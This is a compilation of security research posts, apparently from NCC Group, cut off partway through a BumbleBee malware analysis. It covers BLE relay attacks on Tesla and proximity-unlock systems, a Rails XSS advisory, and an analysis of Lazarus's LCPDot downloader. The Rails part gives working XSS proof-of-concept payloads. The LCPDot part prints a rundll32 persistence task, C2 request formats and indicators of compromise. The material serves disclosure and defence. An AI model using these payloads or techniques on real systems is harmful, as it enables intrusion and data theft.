NCC Group Research

Technical Advisory – Tesla BLE Phone-as-a-Key Passive Entry Vulnerable to Relay Attacks

15 May 2022 at 23:54
Vendor: Tesla, Inc.
Vendor URL: https://www.tesla.com
Versions affected: Attack tested with vehicle software v11.0 (2022.8.2 383989fadeea) and iOS app 4.6.1-891 (3784ebe63).
Systems Affected: Attack tested on Model 3. Model Y is likely also affected.
Author: Sultan Qasim Khan <sultan.qasimkhan[at]nccgroup[dot]com>
Risk: <6.8 CVSS v3.1 AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N> An attacker within Bluetooth signal range of a mobile device configured for Phone-as-a-Key use can conduct a relay attack to unlock and operate a vehicle despite the authorized mobile device being out of range of the vehicle.

Summary

The Tesla Model 3 and Model Y employ a Bluetooth Low Energy (BLE) based passive entry system. This system allows users with an authorized mobile device or key fob within a short range of the vehicle to unlock and operate the vehicle, with no user interaction required on the mobile device or key fob. This system infers proximity of the mobile device or key fob based on signal strength (RSSI) and latency measurements of cryptographic challenge-response operations conducted over BLE.

NCC Group has developed a tool for conducting a new type of BLE relay attack operating at the link layer, for which added latency is within the range of normal GATT response timing variation, and which is capable of relaying encrypted link layer communications. This approach can circumvent the existing relay attack mitigations of latency bounding or link layer encryption, and bypass localization defences commonly used against relay attacks that use signal amplification. As the latency added by this relay attack is within the bounds accepted by the Model 3 (and likely Model Y) passive entry system, it can be used to unlock and drive these vehicles while the authorized mobile device or key fob is out of range.

Impact

If an attacker can place a relaying device within BLE signal range of a mobile phone or key fob authorized to access a Tesla Model 3 or Model Y, they can conduct a relay attack to unlock and operate the vehicle.

Neither normal GATT response latency nor successful communications over an encrypted link layer can be used as indications that a relay attack is not in progress. Consequently, conventional mitigations against prior BLE relay attacks are rendered ineffective against link layer relay attacks.

Details

NCC Group has developed a tool for conducting a new type of Bluetooth Low Energy (BLE) relay attack that can forward link-layer responses within a single connection event, and introduces as little as 8 ms of round-trip latency beyond normal operation. As typical connection intervals for this system are 30 ms or longer, and the added latency is within the range of normal response timing variation for BLE devices, the added latency can be made effectively invisible to the vehicle and phone software. Furthermore, this new type of relay attack can relay connections employing BLE link layer encryption, including following encrypted connections through parameter changes (such as changes to the channel map, connection interval, and transmit window offset).

This relay attack tool can be used for any devices communicating over BLE, and is not specific to Tesla vehicles.

Testing on a 2020 Tesla Model 3 running software v11.0 (2022.8.2) with an iPhone 13 mini running version 4.6.1-891 of the Tesla app, NCC Group was able to use this newly developed relay attack tool to unlock and operate the vehicle while the iPhone was outside the BLE range of the vehicle. In the test setup, the iPhone was placed on the top floor at the far end of a home, approximately 25 metres away from the vehicle, which was in the garage at ground level. The phone-side relaying device was positioned in a separate room from the iPhone, approximately 7 metres away from the phone. The vehicle-side relaying device was able to unlock the vehicle when placed within a radius of approximately 3 metres from the vehicle.

NCC Group has not tested this relay attack against a Model Y or in conjunction with the optional Tesla Model 3/Y BLE key fob. However, given the similarity of the technologies used, NCC Group expects the same type of relay attack would be possible against these targets.

During experimentation to identify latency bounds, NCC Group discovered that relay attacks against the Model 3 remained effective with up to 80 ms of round trip latency artificially added beyond the base level of latency introduced by the relaying tool over a local Wi-Fi network. This latency margin should be sufficient for conducting long-distance relay attacks over the internet. However, NCC Group has not attempted any long distance relay attacks against Tesla vehicles.
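The latency margin described above can be turned into a rough budget check. The following is a minimal sketch only: the 80 ms figure comes from the advisory, while the fibre propagation speed (about 200 km per millisecond) and both function names are assumptions introduced for illustration. Real internet paths add routing and queuing delay, so the distance figure is an upper bound at best.

```python
# Illustrative latency-budget arithmetic; not part of NCC Group's tooling.
TOLERATED_EXTRA_RTT_MS = 80.0  # extra round-trip latency still accepted in testing (from the advisory)
FIBRE_KM_PER_MS = 200.0        # assumption: light travels roughly 200 km per ms in optical fibre


def relay_link_fits(extra_rtt_ms: float) -> bool:
    """Return True if a relay link's added round-trip time stays within the observed margin."""
    return 0 <= extra_rtt_ms <= TOLERATED_EXTRA_RTT_MS


def max_one_way_fibre_km(extra_rtt_ms: float = TOLERATED_EXTRA_RTT_MS) -> float:
    """Upper bound on one-way fibre distance, ignoring routing and queuing delay."""
    return (extra_rtt_ms / 2) * FIBRE_KM_PER_MS
```

Under these assumptions, a relay link that adds 35 ms of round-trip time would fit within the margin, and the full 80 ms corresponds to at most a few thousand kilometres of fibre in each direction.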

Recommendation

Users should be educated about the risks of BLE relay attacks, and encouraged to use the PIN to Drive feature. Consider also providing users with an option to disable passive entry. To reduce opportunities for relay attacks, consider disabling passive entry functionality in the mobile app when the mobile device has been stationary for more than a minute. Also consider having the mobile application report the mobile device’s last known location during the authentication process with the vehicle, so that the vehicle can detect and reject long distance relay attacks.

For reliable prevention of relay attacks in future vehicles, secure ranging using a time-of-flight based measurement system (such as Ultra Wide Band) must be used.
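To illustrate why time-of-flight ranging resists relaying, the sketch below computes distance from a two-way timing exchange. It is a simplified model under stated assumptions: the function names and the 3 metre unlock threshold are hypothetical, and a real secure ranging system must also protect the timing exchange cryptographically. The point is that a relay can only add delay, which can only make the measured distance larger.

```python
# Simplified two-way time-of-flight model; names and the threshold are illustrative assumptions.
SPEED_OF_LIGHT_M_PER_NS = 0.299792458


def tof_distance_m(round_trip_ns: float, reply_delay_ns: float) -> float:
    """Estimate distance from the round-trip time minus the responder's known reply delay."""
    one_way_flight_ns = (round_trip_ns - reply_delay_ns) / 2
    return one_way_flight_ns * SPEED_OF_LIGHT_M_PER_NS


def within_unlock_range(round_trip_ns: float, reply_delay_ns: float,
                        max_distance_m: float = 3.0) -> bool:
    """Accept only if the measured distance is inside the (hypothetical) unlock radius."""
    return tof_distance_m(round_trip_ns, reply_delay_ns) <= max_distance_m
```

With a 1000 ns reply delay, a 1020 ns round trip corresponds to roughly 3 metres. Adding even the 8 ms of relay latency quoted earlier (8,000,000 ns) would place the device over a thousand kilometres away in this model.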

Vendor Communication

April 21, 2022: Disclosure to Tesla Product Security
April 28, 2022: Response from Tesla Product Security stating that relay attacks are a known limitation of the passive entry system.
May 9, 2022: Tesla Product Security notified of NCC Group’s intent to publish research regarding BLE relay attacks and their applicability to Tesla products.
May 15, 2022: Advisory released to public

Thanks to

Jeremy Boone for support and guidance throughout the research process developing this attack.

Editor’s Note (May 15 2022)

This research involves a generic link-layer relay attack on Bluetooth Low Energy, which affects products other than those mentioned here. That advisory was also published today and is available at:
https://research.nccgroup.com/2022/05/15/technical-advisory-ble-proximity-authentication-vulnerable-to-relay-attacks/

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date: May 15, 2022
Written by: Sultan Qasim Khan

Technical Advisory – BLE Proximity Authentication Vulnerable to Relay Attacks

15 May 2022 at 22:52
Vendor: Bluetooth SIG, Inc.
Vendor URL: https://www.bluetooth.com
Versions Affected: Specification versions 4.0 to 5.3
Systems Affected: Any systems relying on the presence of a Bluetooth LE connection as confirmation of physical proximity, regardless of whether link layer encryption is used
Author: Sultan Qasim Khan <sultan.qasimkhan[at]nccgroup[dot]com>
Risk: An attacker can falsely indicate the proximity of Bluetooth LE (BLE) devices to one another through the use of a relay attack. This may enable unauthorized access to devices in BLE-based proximity authentication systems.

Summary

Many products implement Bluetooth Low Energy (BLE) based proximity authentication, where the product unlocks or remains unlocked when a trusted BLE device is determined to be nearby. Common examples of such products include automotive Phone-as-a-Key systems, residential smart locks, BLE-based commercial building access control systems, and smartphones and laptops with trusted BLE device functionality. The possibility of relay attacks against BLE proximity authentication has been known for years, but existing public relay attack tooling (based on forwarding GATT requests and responses) introduces detectable levels of latency and is incapable of relaying connections employing link layer encryption. Thus, products commonly attempt to prevent relay attacks by imposing strict GATT response time limits and/or using link layer encryption. Some systems also try to block signal amplification relay attacks through various localization techniques involving triangulation.

NCC Group has developed a tool for conducting a new type of BLE relay attack operating at the link layer, for which added latency is within the range of normal GATT response timing variation, and which is capable of relaying encrypted link layer communications. This approach can circumvent the existing relay attack mitigations of latency bounding or link layer encryption, and bypass localization defences commonly used against relay attacks that use signal amplification.

Impact

If an attacker can place a relaying device within signal range of a target BLE device (Victim Device A) trusted for proximity authentication by another device (Victim Device B), then they can conduct a relay attack to unlock and operate Victim Device B.

Neither normal GATT response latency nor successful communications over an encrypted link layer can be used as indications that a relay attack is not in progress. Consequently, conventional mitigations to prior BLE relay attacks are rendered ineffective against link layer relay attacks.

Details

NCC Group has developed a tool for conducting a new type of Bluetooth Low Energy (BLE) relay attack that can forward link-layer responses within a single connection event and introduces as little as 8 ms of round-trip latency beyond normal operation. As typical connection intervals in proximity authentication systems are 30 ms or longer, added latency can generally be limited to a single connection event. With further straightforward refinement of the tool, it would be possible to guarantee that the added response latency is one connection event or less for any connection interval permissible under the Bluetooth specification.
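The relationship between added latency and connection events can be sketched with simple arithmetic. This is a deliberately simplified model, assuming a delayed response slips to the next connection event boundary; the function name is hypothetical. The 8 ms and 30 ms figures come from the text, and 7.5 ms is the shortest connection interval the Bluetooth specification permits.

```python
import math


def added_connection_events(added_latency_ms: float, connection_interval_ms: float) -> int:
    """Simplified model: number of connection intervals spanned by the relay's added latency."""
    return math.ceil(added_latency_ms / connection_interval_ms)
```

In this model, 8 ms of added latency costs one connection event at a 30 ms interval but two at the 7.5 ms minimum, which is consistent with the note that further refinement would be needed to stay within one event at every permissible interval.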

Real BLE devices commonly require multiple connection events to respond to GATT requests or notifications and have inherent variability in their response timing. Thus, the latency introduced by this relay attack falls within the range of normal response timing variation.

Since this relay attack operates at the link layer, it can forward encrypted link layer PDUs. It is also capable of detecting encrypted changes to connection parameters (such as connection interval, WinOffset, PHY mode, and channel map) and continuing to relay connections through parameter changes. Thus, neither link layer encryption nor encrypted connection parameter changes are defences against this type of relay attack.

Recommendation

The Bluetooth Core Specification does not make any claims of relay attack resistance. Furthermore, Section 6 of the Proximity Profile[1] (v1.0.1, updated in 2015) explicitly warns of the possibility of relay attacks, noting that proximity indicated by a BLE connection “should not be used as the only protection of valuable assets.” However, many members of the Bluetooth SIG have produced BLE proximity authentication systems intended for security critical applications, and some make claims of relay attack resistance while still being at risk. Makers of such systems and their applications are also commonly promoted [2],[3],[4],[5] on the Bluetooth SIG Blog despite the documented risks.

NCC Group recommends that the SIG proactively advise its members developing proximity authentication systems about the risks of BLE relay attacks. Moreover, documentation should make clear that relay attacks are practical and must be included in threat models, and that neither link layer encryption nor expectations of normal response timing are defences against relay attacks. Developers should be encouraged to either require user interaction on the mobile device to authorize unlock, or adopt a time-of-flight based secure ranging (distance bounding) solution using technologies such as Ultra-Wide Band (UWB). For existing systems where hardware modification is not feasible, NCC Group recommends that end users be educated about the risks of relay attacks and presented with an option to disable passive entry functionality that relies on inferred proximity alone. Risk can also be reduced by disabling passive unlock functionality when the user’s mobile device has been stationary for more than a minute (as measured by accelerometer readings).
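The stationary-device mitigation could be sketched as a small gate that tracks the last time motion was observed. Everything here is an assumption made for illustration: the class name, the 0.05 g motion threshold, and the idea of feeding it per-sample acceleration deltas. Only the one-minute limit comes from the recommendation above.

```python
from dataclasses import dataclass

STATIONARY_LIMIT_S = 60.0  # "stationary for more than a minute", per the recommendation


@dataclass
class MotionGate:
    """Hypothetical helper: allow passive unlock only shortly after observed motion."""
    motion_threshold_g: float = 0.05       # assumption: change in acceleration treated as motion
    last_motion_s: float = float("-inf")   # no motion seen yet

    def record_sample(self, timestamp_s: float, accel_delta_g: float) -> None:
        # Remember the most recent time the accelerometer reported meaningful movement.
        if abs(accel_delta_g) >= self.motion_threshold_g:
            self.last_motion_s = timestamp_s

    def passive_unlock_allowed(self, now_s: float) -> bool:
        # Deny passive unlock once the device has been still for longer than the limit.
        return (now_s - self.last_motion_s) <= STATIONARY_LIMIT_S
```

A gate like this reduces the window for relaying against a phone left on a desk or nightstand, but it does not stop an attack while the owner is walking around, so it complements rather than replaces secure ranging.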

Vendor Communication

April 4, 2022: Disclosure to Bluetooth SIG
April 19, 2022: Response from Bluetooth SIG confirming that relay attacks are a known risk, and that more accurate ranging mechanisms are under development.
April 19, 2022: Follow up message to Bluetooth SIG clarifying certain details of relay attack based on questions from the SIG.
May 15, 2022: Advisory released to public

Thanks to

Jeremy Boone for his support and guidance throughout the research process developing this attack.

References

[1] https://www.bluetooth.com/specifications/specs/proximity-profile-1-0-1/

[2] https://www.bluetooth.com/blog/why-texas-instruments-uses-bluetooth-technology-for-their-digital-key-solutions/

[3] https://www.bluetooth.com/blog/how-alps-alpine-uses-bluetooth-technology-for-secure-digital-key-solutions/

[4] https://www.bluetooth.com/blog/new-bluetooth-application-for-the-automotive-industry/

[5] https://www.bluetooth.com/blog/intelligent-mobility-solution-for-e-motorcycles-achieves-true-peps/

Published date: May 15, 2022
Written by: Sultan Qasim Khan

Technical Advisory: Ruby on Rails – Possible XSS Vulnerability in ActionView tag helpers (CVE-2022-27777)

Vendor: Ruby on Rails
Vendor URL: https://rubyonrails.org
Versions affected: versions prior to 7.0.2.4, 6.1.5.1, 6.0.4.8, 5.2.7.1
Operating Systems Affected: ALL
Author: Álvaro Martín Fraguas <alvaro.martin[at]nccgroup[dot]com>
Advisory URLs:
- https://groups.google.com/g/rubyonrails-security/c/Yg2tEh2UUqc
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27777
Accepted commit for the fix in the official master branch:
- https://github.com/rails/rails/commit/649516ce0feb699ae06a8c5e81df75d460cc9a85
Risk: Medium (XSS vulnerability in some cases for some Rails methods).

Summary

Ruby on Rails is a web application framework that follows the Model-view-controller (MVC) pattern. It offers some protections against Cross-site scripting (XSS) attacks in its helpers for the views. Several tag helpers in ActionView::Helpers::FormTagHelper and ActionView::Helpers::TagHelper are vulnerable to XSS because their current protection does not properly restrict the set of characters allowed in the names of tag attributes and in the names of tags.

Impact

In some cases, Ruby on Rails applications that use the aforementioned helpers with user-supplied input are vulnerable to XSS attacks. Through them, it is possible to steal passwords or other private information from the user, substitute parts of the website with fake content, perform scans of the network of the user, etc.

Details

The first group of vulnerabilities is related to the options argument in methods from FormTagHelper like check_box_tag, label_tag, radio_button_tag, select_tag, submit_tag, text_area_tag, text_field_tag, etc. In particular, the following three cases are affected:

  • When providing prefixed HTML data-* attributes.
  • When providing prefixed HTML aria-* attributes.
  • When providing a hash of other types of non-boolean attributes.

For example:

check_box_tag('thename', 'thevalue', false, data: { malicious_input => 'thevalueofdata' })

In that method call, when the variable malicious_input is controlled in part or completely by a user of the application, an attacker can provide an input that will break free from the tag and execute arbitrary JavaScript code. For some applications, that code can be executed in the browser of a different user visiting the application. A simplified proof of concept with only reflected XSS would be this HTML ERB view file:

<%= check_box_tag('thename', 'thevalue', false, data: { params[:payload] => 'thevalueofdata' }) %>

Followed by a request that included the malicious URL parameter: http://...?payload=something="something"><img src="/nonexistent" onerror="alert(1)"><div class

That example only shows an alert window, but the vulnerability makes it possible to steal passwords or other private information from the user, substitute parts of the website with fake content, attack other websites visited by the user, perform scans of the network of the user, etc. And some applications are probably using more dangerous stored user input instead of URL parameters, allowing attackers to perform stored XSS attacks on other users.
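The mechanism can be reproduced outside Rails with a small simulation. The sketch below is written in Python purely to mirror the logic; it is not the Rails implementation and not the official patch. The functions `naive_tag` and `checked_tag` and the `SAFE_NAME` allow-list are hypothetical names introduced here. It shows that escaping attribute values is not enough when attribute names are emitted verbatim.

```python
import re
from html import escape


def naive_tag(name: str, attrs: dict) -> str:
    """Mimics the flawed pattern: attribute values are escaped, attribute names are not."""
    rendered = " ".join(f'{key}="{escape(str(value))}"' for key, value in attrs.items())
    return f"<{name} {rendered}>"


# Hypothetical allow-list for tag and attribute names (an assumption, not the Rails fix).
SAFE_NAME = re.compile(r"[A-Za-z][A-Za-z0-9_:.-]*")


def checked_tag(name: str, attrs: dict) -> str:
    """Reject any tag or attribute name containing characters outside the allow-list."""
    for candidate in (name, *attrs):
        if not SAFE_NAME.fullmatch(str(candidate)):
            raise ValueError(f"unsafe tag or attribute name: {candidate!r}")
    return naive_tag(name, attrs)
```

Passing the payload from the URL above as part of a data-* attribute name to `naive_tag` yields markup in which the injected img element sits outside the original tag, while `checked_tag` refuses the same input. Applications that cannot update immediately might apply a comparable allow-list to user-controlled names before they reach the helpers.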

Here is another example with aria-* HTML attributes where the same simple payload can be tested:

check_box_tag('thename', 'thevalue', false, aria: { malicious_input => 'thevalueofaria' })

And finally, another example with other non-boolean attributes:

check_box_tag('thename', 'thevalue', false, malicious_input => 'theothervalue')

This same vulnerable structure can also be attacked successfully in the other methods listed at the beginning of this post: label_tag, radio_button_tag, select_tag, submit_tag, text_area_tag, text_field_tag...

The second group of vulnerabilities is related to the more generic methods tag and content_tag from TagHelper. They are vulnerable in the options argument like the previous group of methods, but they are also vulnerable in their first argument, for the names of the generated tags, using the same kind of attack to break free from the tag and execute arbitrary JavaScript code. For example:

  • tag(malicious_input)
  • tag.public_send(malicious_input.to_sym)
  • content_tag(malicious_input)

In the 3 cases, this is an example of a simple payload structure that works:

img%20src=%22/nonexistent%22%20onerror=%22javascript_payload%22

As said before for other examples, the vulnerability makes it possible to steal passwords or other private information from the user, substitute parts of the website with fake content, perform scans of the network of the user, etc.

Recommendation

If possible, update to any of the fixed versions: 7.0.2.4, 6.1.5.1, 6.0.4.8, 5.2.7.1

If updating is not an option, apply the patches provided in the official advisory: https://groups.google.com/g/rubyonrails-security/c/Yg2tEh2UUqc

Vendor Communication

2022-01-08 – Issue reported with patches through the official Ruby on Rails disclosure platform.
2022-04-26 – Release of patched Ruby on Rails versions, and official advisory published.
2022-05-06 – NCC Group advisory published.

Thanks to

Finding and fixing the vulnerabilities was the result of a personal research project that was part of the graduate training program at NCC Group. I would like to thank my colleagues at NCC Group for the opportunity to work there and the support they always provide. Especially:

  • Sergio de Miguel as my mentor, line manager and one of the leads of the graduate training program.
  • Daniel Romero as the regional research director in Spain.
  • David Muñoz as a lead of the graduate training program.

Also thanks to the Ruby on Rails core team and other contributors for making such an awesome web application framework, and to everyone who has helped me in my years as a Ruby on Rails developer.

North Korea’s Lazarus: their initial access trade-craft using social media and social engineering

Authored by: Michael Matthews and Nikolaos Pantazopoulos

tl;dr

This blog post documents some of the actions taken during the initial access phase for an attack attributed to Lazarus, along with analysis of the malware that was utilised during this phase.

The methods used to gain access to a victim network are widely reported; however, nuances in post-exploitation provide a wealth of information on attack paths and threat hunting material that relate closely to the TTPs of the Lazarus group.

In summary, we identified the following findings:

  • Lazarus used LinkedIn profiles to impersonate employees of other legitimate companies
  • Lazarus communicated with target employees through communication channels such as WhatsApp.
  • Lazarus enticed victims to download job adverts (zip files) containing malicious documents that led to the execution of malware
  • The identified malicious downloader appears to be a variant of LCPDOT
  • Scheduled tasks are utilised as a form of persistence (rundll32 execution from a scheduled task)

Initial Access

In line with what is publicly documented[1], the initial entry revolves heavily around social engineering, with recent efforts involving the impersonation of Lockheed Martin employees with LinkedIn profiles to persuade victims into following up with job opportunities that result in a malicious document being delivered.

In this instance, the domain hosting the document was global-job[.]org, likely attempting to impersonate globaljobs[.]org, a US based government/defence recruitment website. To sidestep the security controls recently introduced by Microsoft for Office macros, the website hosted a ZIP file which contained the malicious document.

The document had several characteristics comparable to other Lazarus samples; however, due to unknown circumstances, the “shapes” containing the payloads were unavailable and could not be analysed.

Following the execution of the macro document, rundll32.exe was called to execute the DLL C:\programdata\packages.mdb, which then led to the initial command-and-control server call out. Unfortunately, the binary itself was no longer available for analysis; however, it is believed that this component led to the LCPDot malware being placed on the victim’s host.

LCPDot

We were able to recover a malicious downloader that was executed as a scheduled task. The identified sample appears to be a variant of LCPDot, and it is attributed to the threat actor ‘Lazarus’.

The file in question attempted to blend into the environment, leveraging the ProgramData directory once again: C:\ProgramData\Oracle\Java\JavaPackage.dll. However, the file had characteristics that stand out whilst threat hunting:

  • Large file size (60 MB+) – likely to bypass anti-virus scanning
  • Time stomping – timestamps copied from CMD.exe
  • DLL owned by a user in the ProgramData directory (Not SYSTEM or Administrator)

To execute LCPDot, a scheduled task was created named “Windows Java Vpn Interface”, attempting to blend into the system with the Java theme. The scheduled task executed the binary but also allowed the threat actor to persist.

The scheduled task was set to run daily and executed the following action:

    <Exec>
      <Command>c:\windows\system32\rundll32.exe</Command>
      <Arguments>C:\ProgramData\Oracle\Java\JavaPackage.dll,VpnUserInterface</Arguments>
    </Exec>
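For threat hunting, exported scheduled task definitions can be scanned for this pattern. The following is a minimal sketch, assuming the task XML has already been read and decoded into a string; the function name and the choice to flag any rundll32 action that loads a file from C:\ProgramData are assumptions made for illustration and will need tuning against legitimate software.

```python
import xml.etree.ElementTree as ET


def suspicious_rundll32_actions(task_xml: str) -> list:
    """Return (command, arguments) pairs where rundll32 loads a file from C:\\ProgramData."""
    findings = []
    root = ET.fromstring(task_xml)
    for element in root.iter():
        # Compare local names so the check works with or without an XML namespace.
        if element.tag.rsplit("}", 1)[-1] != "Exec":
            continue
        fields = {child.tag.rsplit("}", 1)[-1]: (child.text or "").strip() for child in element}
        command = fields.get("Command", "")
        arguments = fields.get("Arguments", "")
        # rundll32 arguments take the form <path>,<export>; keep only the path part.
        dll_path = arguments.split(",", 1)[0].strip().strip('"').lower()
        if command.lower().endswith("rundll32.exe") and dll_path.startswith("c:\\programdata\\"):
            findings.append((command, arguments))
    return findings
```

Run against the action shown above, this returns a single finding for JavaPackage.dll with the VpnUserInterface export. Combining it with the file-size, timestamp and ownership characteristics listed earlier should reduce false positives.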

LCPDot Binary Analysis

The downloader’s malicious core starts in a separate thread and the execution flow is determined based on Windows message IDs (sent by the Windows API function SendMessage).

In the following sections we describe the most important features that we identified during our analysis.

Initialisation Phase

The initialisation phase takes place in a new thread and the following tasks are performed:

  • Initialisation of class MoscowTownList. This class has the functionality to read/write the configuration.
  • Creation of configuration file on disk. The configuration file is stored under the filename VirtualStore.cab in %APPDATA%\Local folder. The configuration includes various metadata along with the command-and-control servers URLs. The structure that it uses is:
struct Configuration
{
    DWORD Unknown;                  // Unknown, set to 0 by default. If higher than 20, it can
                                    // cause a 2-hour delay during the network
                                    // communication process.
    SYSTEMTIME Variant_SystemTime;  // Configuration timestamp created by
                                    // SystemTimeToVariantTime.
    SYSTEMTIME Host_SystemTime;     // Configuration timestamp. Updated during the
                                    // network communication process.
    DWORD Logical_drives_find_flag; // Set to 0 by default
    DWORD Active_sessions_flag;     // Set to 0 by default
    DWORD Boot_Time;                // Milliseconds since boot time
    char *C2_Data;                  // Command-and-control servers' domains
};

The configuration is encrypted with RC4. The downloader hashes (SHA-1) a random byte array (16 bytes) and uses the hash output to derive (CryptDeriveKey) an RC4 key (16 bytes). Lastly, it writes the random byte array to the configuration file, followed by the encrypted configuration data.

  • Enumeration of logical drives and active logon sessions. The enumeration happens only if specified in the configuration. By default, this option is off. Furthermore, even if enabled, it does not appear to have any effect (e.g. sending them to the command-and-control server).
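The configuration encryption described above can be approximated in a few lines for analysts who want to decrypt a recovered VirtualStore.cab. This is a sketch under stated assumptions: it assumes that CryptDeriveKey with SHA-1 and a 128-bit RC4 key yields the first 16 bytes of the hash, and that the file layout is exactly the 16-byte random array followed by the ciphertext. The function names are hypothetical and the code has not been validated against a real sample.

```python
import hashlib


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: key scheduling followed by keystream generation XORed with the data."""
    state = list(range(256))
    j = 0
    for i in range(256):
        j = (j + state[i] + key[i % len(key)]) % 256
        state[i], state[j] = state[j], state[i]
    i = j = 0
    output = bytearray()
    for byte in data:
        i = (i + 1) % 256
        j = (j + state[i]) % 256
        state[i], state[j] = state[j], state[i]
        output.append(byte ^ state[(state[i] + state[j]) % 256])
    return bytes(output)


def derive_key(seed: bytes) -> bytes:
    # Assumption: the derived 128-bit RC4 key is the first 16 bytes of SHA-1(seed).
    return hashlib.sha1(seed).digest()[:16]


def decrypt_config(blob: bytes) -> bytes:
    # Assumed layout: 16 random bytes, then the RC4-encrypted configuration.
    seed, ciphertext = blob[:16], blob[16:]
    return rc4(derive_key(seed), ciphertext)
```

Because RC4 is symmetric, the same routine encrypts and decrypts. The second-stage payload is described later as using the same SHA-1 and RC4 derivation, so `derive_key` and `rc4` may be reusable there if the assumptions hold.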

Once this phase is completed, the downloader starts the network communication with its command-and-control servers.

Network Communication

At this stage, the downloader registers the compromised host to the command-and-control server and then requests the payload to execute. In summary, the following steps are taken:

  • Initialises the classes Taxiroad and WashingtonRoad.
  • Creates a byte array (16 bytes), which is then encoded (base64), and a session ID. Both are sent to the server. The encoded byte array is used later to decrypt the received payload and is added to the body content of the request:
    redirect=Yes&idx=%d&num=%s, where idx holds the compromised host’s boot time value and num has the (BASE64) encoded byte array.
    In addition, the session ID is encoded (BASE64) and added to the following string:
    SESSIONID-%d-202110, where 202110 is the network command ID.
    The above string is encoded again (BASE64) and then added to the SESSIONID header of the POST request.

After registering the compromised host, the server replies with one of the following messages:

  • Validation Success – Bot registered without any issues.
  • Validation Error – An error occurred.

Once the registration process has been completed, the downloader sends a GET request to download the second-stage payload. The received payload is decrypted by hashing (SHA-1) the previously created byte array and then using the resulting hash to derive (CryptDeriveKey) an RC4 key.

Lastly, the decrypted payload is loaded directly into memory and executed in a new thread.

In summary, we identified the following commands (Table 1).

Command ID   Description
202110       Register compromised host to the command-and-control server
202111       Request payload from the command-and-control server
Table 1 – Identified network commands
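For network detection, the SESSIONID header described above can be decoded and matched against the command IDs in Table 1. The sketch below is an interpretation of the description rather than a verified parser: it assumes the header is standard Base64 of a string shaped like SESSIONID-<value>-<six-digit command ID>, and the function name and return shape are hypothetical.

```python
import base64
import re

# Command IDs taken from Table 1.
COMMANDS = {
    "202110": "register compromised host",
    "202111": "request payload",
}
HEADER_PATTERN = re.compile(r"SESSIONID-(.+)-(\d{6})")


def parse_sessionid_header(header_value: str):
    """Decode a SESSIONID header; return (session part, command ID, meaning) or None."""
    try:
        decoded = base64.b64decode(header_value, validate=True).decode("ascii")
    except ValueError:  # covers invalid Base64 and non-ASCII content
        return None
    match = HEADER_PATTERN.fullmatch(decoded)
    if match is None:
        return None
    session_part, command_id = match.groups()
    return session_part, command_id, COMMANDS.get(command_id, "unknown")
```

A proxy log search could run this over POST requests that carry a SESSIONID header and alert on any value that decodes to a known command ID.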

Unused Commands and Functions

One interesting observation is the presence of functions and network commands that the downloader does not appear to use. We concluded that the following network commands are not used by the downloader (at least in this variant), but we believe that the operators may use them on the server side (e.g. in the PHP scripts to which the downloader sends data) or that the loaded payload uses them (note: commands 789020, 789021 and 789022 are disabled by default):

  • 202112 – Sends encrypted data in a POST request. Data context is unknown.
  • 202114 – Sends a POST request with body content ‘Cookie=Enable’.
  • 789020 – Same functionality as command ID 202111.
  • 789021 – Same functionality as command ID 202112.
  • 789022 – Sends a POST request with body content ‘Cookie=Enable’.

Indicators of Compromise

Domains

  • ats[.]apvit[.]com – Legitimate Compromised website
  • bugs-hpsm[.]mobitechnologies[.]com – Legitimate Compromised website
  • global-job[.]org
  • thefrostery[.]co[.]uk – Legitimate Compromised website
  • shoppingbagsdirect[.]com – Legitimate Compromised website

IP Address

  • 13[.]88[.]245[.]250

Hashes

Javapackage.dll

MD5: AFBCB626B770B1F87FF9B5721D2F3235

SHA1: D25A4F20C0B9D982D63FC0135798384C17226B55

SHA256: FD02E0F5FCF97022AC266A3E54888080F66760D731903FC32DF2E17E6E1E4C64

Virtualstore.cab

MD5: 49C2821A940846BDACB8A3457BE4663C

SHA1: 0A6F762A47557E369DB8655A0D14AB088926E05B

SHA256: F4E314E8007104974681D92267673AC22721F756D8E1925142D9C26DC8A0FFB4

MITRE ATT&CK

Technique                                   ID
Phishing: Spearphishing via Service         T1566.003
Scheduled Task/Job: Scheduled Task          T1053.005
User Execution: Malicious File              T1204.002
Application Layer Protocol: Web Protocols   T1071.001

References

[1] https://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/

Adventures in the land of BumbleBee – a new malicious loader

Authored by: Mike Stokkel, Nikolaos Totosis and Nikolaos Pantazopoulos

tl;dr

BUMBLEBEE is a new malicious loader that is being used by several threat actors and has been observed to download different malicious samples. The key points are:

  • BUMBLEBEE is statically linked with the open-source libraries OpenSSL 1.1.0f and Boost 1.68. In addition, it is compiled using Visual Studio 2015.
  • BUMBLEBEE uses a set of anti-analysis techniques. These are taken directly from the open-source Khasar project [1].
  • BUMBLEBEE has Rabbort.DLL embedded, using it for process injection.
  • BUMBLEBEE has been observed to download and execute different malicious payloads such as Cobalt Strike beacons.

Introduction

In March 2022, Google’s Threat Analysis Group [2] published research on a malware strain linked to Conti’s Initial Access Broker, known as BUMBLEBEE. BUMBLEBEE’s distribution methods overlap with those of typical BazarISO campaigns.

In recent months, BUMBLEBEE has used three different distribution methods:

  • Distribution via ISO files, which are created either with StarBurn ISO or PowerISO software, and are bundled along with a LNK file and the initial payload.
  • Distribution via OneDrive links.
  • Email thread hijacking with password protected ZIPs

BUMBLEBEE is currently under heavy development and has seen some small changes in the last few weeks. For example, earlier samples of BUMBLEBEE used the user-agent ‘bumblebee’ and no encryption was applied to the network data. However, this functionality has changed, and recent samples use a hardcoded key as the user-agent, which also acts as the RC4 key for the entire network communication process.

Technical Analysis

Most of the identified samples are protected with what appears to be a private crypter, which so far has only been used for BUMBLEBEE binaries. This crypter uses an export function named SetPath and does not yet implement any obfuscation method (e.g. string encryption).

The BUMBLEBEE payload starts off by performing a series of anti-analysis checks, which are taken directly from the open source Khasar project[1]. Once these checks pass, BUMBLEBEE proceeds with the command-and-control communication to receive tasks to execute.

Network Communication

BUMBLEBEE’s network communication procedure is simple. First, the loader picks a command-and-control IP address and sends an HTTPS GET request, which includes the following information in JSON format (encrypted with RC4):

Key Description
